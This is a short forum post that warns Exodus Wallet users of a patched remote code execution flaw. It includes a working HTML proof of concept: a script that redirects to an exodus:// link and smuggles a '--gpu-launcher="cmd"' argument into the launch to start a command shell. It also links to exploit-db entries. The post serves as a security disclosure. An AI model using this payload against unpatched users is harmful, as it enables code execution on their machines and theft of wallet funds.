I don't know if this has been mentioned before in the forums, but take when browsing the web with your Exodus Wallet open. The last version seems to be patched, hence it doesn't seem to be vulnerable.
Here's a safe to try proof of concept of the security flaw:
<!doctype html>
<script>
window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='
</script>
You can save that as HTML if you desire and see how Exodus process the request. Here's also 2 links to exploit-db for more information about the RCE:
-
https://www.exploit-db.com/exploits/44357/-
https://www.exploit-db.com/exploits/43899/Merit is welcome. Safe browsing!
Chris,